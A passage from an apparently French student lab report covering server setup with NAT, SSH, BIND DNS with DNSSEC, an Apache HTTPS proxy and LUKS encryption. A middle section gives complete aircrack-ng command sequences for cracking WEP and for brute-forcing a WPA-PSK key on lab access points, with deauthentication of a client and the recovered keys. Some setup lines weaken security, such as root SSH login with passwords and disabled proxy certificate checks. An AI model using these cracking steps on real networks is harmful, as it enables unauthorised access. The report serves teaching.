&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
